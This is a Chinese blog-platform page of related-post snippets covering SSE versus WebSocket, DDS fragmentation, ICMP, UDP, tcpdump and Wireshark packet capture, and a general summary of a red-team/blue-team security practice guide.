07-17 346
说起服务端主动推送,大家第一个想到的一定是WEBSOCKET。作为软件工程师,不能无脑使用一种技术,要结合实际情况,择优选取。SSE(Server-Sent Events)相比于WEBSOCKET1、轻量化、兼容性 基于传统的HTTP协议,所以浏览器兼容性比较好2、 只支持单向通讯。(服务器->客户端)
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 812
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 979
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 886
计算机网络技术期末复习
CWPIN21的博客
07-17 1093
本文深入探讨了计算机网络的核心概念与关键技术。涵盖了网络拓扑结构,如星型、总线型和环形等,分析了它们的特点与适用场景。详细阐述了 TCP/IP 协议栈的工作原理,包括 IP 地址分配、子网掩码的作用以及路由选择算法。还探讨了网络安全方面的常见威胁,如病毒、黑客攻击等,并介绍了相应的防护措施。通过实例,让读者对计算机网络有更全面、深入的理解。
使用tcpdump 和 Wireshark进行简单TCP抓包分析【图文教程】
最新发布
qq_42037383的博客
07-19 803
和都是网络分析工具,用于捕获和分析网络数据包,但它们在功能和使用上有所不同。所以,这两者实际上是搭配使用的,先用 tcpdump 命令在 Linux 服务器上抓包,接着把抓包的文件拖出到 Windows 电脑后,用 Wireshark 可视化分析。如果你是在 Windows 上抓包,只需要用 Wireshark 工具就可以。
网络抓包工具tcpdump的使用
fengzhan12138的博客
07-17 911
tcpdump命令是基于unix系统的命令行的数据报嗅探工具,可以抓取流动在网卡上的数据包,熟悉 tcpdump 的使用能够帮助你分析调试网络数据。
UDP协议
bushibrnxiaohaij的博客
07-17 1074
所以UDP在发送报文前只需要把把头的结构化字段填好,然后防止报文的前面就可以像服务器进行请求了,但是不管是服务器还是客服端,都一定存在大量的UDP报文,所以OS也一定要对这么多的报文进行管理,所以OS也会存在对报文描述的结构体,报文本质就是数据,所以就是一段缓冲区,所以描述报文的结构体里面一定会存在指针。UDP的报头非常简单,存在16位源端口和16为目的端口,16位UDP长度, 表示整个数据报(UDP首部+UDP数据)的最大长度,如果校验和出错, 就会直接丢弃。UDP协议是传输层的协议,是在应用层之下的。
2021实战攻防企业红蓝对抗实践指南-长亭.pdf
07-17
《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份关于红蓝对抗实践的指南文件。红蓝对抗是一种模拟真实攻击和防御的方法,旨在测试企业的安全性能和发现潜在漏洞。 该指南首先介绍了红蓝对抗实践的基本概念和目标。红队代表攻击方,利用各种技术手段和策略试图入侵企业系统,而蓝队则代表防御方,负责检测和阻止攻击,并进行相应的应对和修复措施。 接下来,指南详细解释了红蓝对抗实践的步骤和流程。其中包括情报收集,攻击路径规划,漏洞利用,权限提升,数据抓取等环节,通过逐步深入渗透,验证企业的安全性。 在红蓝对抗实践中,指南还提供了一些常用的攻击技术和实用工具的介绍,如渗透测试工具、漏洞扫描工具和安全分析工具等。同时,还给出了常见的安全防御策略和技术建议,如强化访问控制,加强日志监控和事件响应能力等。 此外,指南还强调了红蓝对抗实践的重要性,并提供了一些实战案例和经验分享,帮助企业更好地理解和应用红蓝对抗技术,提升自身的网络安全防御水平。 总之,《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份全面而实用的红蓝对抗实践指南,对于希望提升网络安全能力的企业和安全从业人员来说,具有很高的参考价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值